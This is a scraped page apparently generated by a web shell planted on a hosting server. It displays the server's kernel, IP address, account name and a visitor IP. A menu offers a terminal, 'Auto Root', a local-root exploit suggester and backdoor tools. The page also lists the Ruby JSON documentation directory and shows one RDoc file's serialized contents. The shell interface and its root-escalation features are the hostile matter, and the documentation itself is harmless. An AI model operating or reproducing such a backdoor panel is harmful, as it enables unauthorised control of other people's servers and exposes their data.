Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
JSON /
Delete
Unzip
Name
Size
Permission
Date
Action
CircularDatastructure
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Ext
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GeneratorError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GenericObject
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
JSONError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
MissingUnicodeSupport
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
NestingError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
ParserError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
%5b%5d-c.ri
696
B
-rw-r--r--
2026-04-07 17:42
cdesc-JSON.ri
25.25
KB
-rw-r--r--
2026-04-07 17:42
create_fast_state-c.ri
261
B
-rw-r--r--
2026-04-07 17:42
create_id%3d-c.ri
513
B
-rw-r--r--
2026-04-07 17:42
create_id-c.ri
354
B
-rw-r--r--
2026-04-07 17:42
create_pretty_state-c.ri
265
B
-rw-r--r--
2026-04-07 17:42
dump-i.ri
1.6
KB
-rw-r--r--
2026-04-07 17:42
dump_default_options-c.ri
531
B
-rw-r--r--
2026-04-07 17:42
fast_generate-i.ri
878
B
-rw-r--r--
2026-04-07 17:42
generate-i.ri
1.67
KB
-rw-r--r--
2026-04-07 17:42
generator-c.ri
482
B
-rw-r--r--
2026-04-07 17:42
iconv-c.ri
326
B
-rw-r--r--
2026-04-07 17:42
load-i.ri
5.45
KB
-rw-r--r--
2026-04-07 17:42
load_default_options-c.ri
550
B
-rw-r--r--
2026-04-07 17:42
load_file%21-i.ri
463
B
-rw-r--r--
2026-04-07 17:42
load_file-i.ri
462
B
-rw-r--r--
2026-04-07 17:42
parse%21-i.ri
827
B
-rw-r--r--
2026-04-07 17:42
parse-i.ri
1.86
KB
-rw-r--r--
2026-04-07 17:42
parser-c.ri
460
B
-rw-r--r--
2026-04-07 17:42
pretty_generate-i.ri
1.04
KB
-rw-r--r--
2026-04-07 17:42
restore-c.ri
288
B
-rw-r--r--
2026-04-07 17:42
restore-i.ri
287
B
-rw-r--r--
2026-04-07 17:42
state-c.ri
505
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" dump:ETI"JSON#dump;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"]Dumps +obj+ as a \JSON string, i.e. calls generate on the object and returns the result.;To:RDoc::Markup::BlankLine o; ; [I"MThe default options can be changed via method JSON.dump_default_options.;T@o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"@Argument +io+, if given, should respond to method +write+; ;TI"Athe \JSON \String is written to +io+, and +io+ is returned. ;TI"9If +io+ is not given, the \JSON \String is returned.;To;;0; [o; ; [I"TArgument +limit+, if given, is passed to JSON.generate as option +max_nesting+.;T@S:RDoc::Markup::Rule:weighti@o; ; [I"UWhen argument +io+ is not given, returns the \JSON \String generated from +obj+:;To:RDoc::Markup::Verbatim; [I";obj = {foo: [0, 1], bar: {baz: 2, bat: 3}, bam: :bad} ;TI"json = JSON.dump(obj) ;TI"Ojson # => "{\"foo\":[0,1],\"bar\":{\"baz\":2,\"bat\":3},\"bam\":\"bad\"}" ;T:@format0o; ; [I"TWhen argument +io+ is given, writes the \JSON \String to +io+ and returns +io+:;To;; [ I"path = 't.json' ;TI"$File.open(path, 'w') do |file| ;TI" JSON.dump(obj, file) ;TI"&end # => #<File:t.json (closed)> ;TI"puts File.read(path) ;T;0o; ; [I"Output:;To;; [I"6{"foo":[0,1],"bar":{"baz":2,"bat":3},"bam":"bad"};T;0: @fileI" ext/json/lib/json/common.rb;T:0@omit_headings_from_table_of_contents_below0I"+JSON.dump(obj, io = nil, limit = nil) ;T0[ I"#(obj, anIO = nil, limit = nil);T@9FI" JSON;TcRDoc::NormalModule00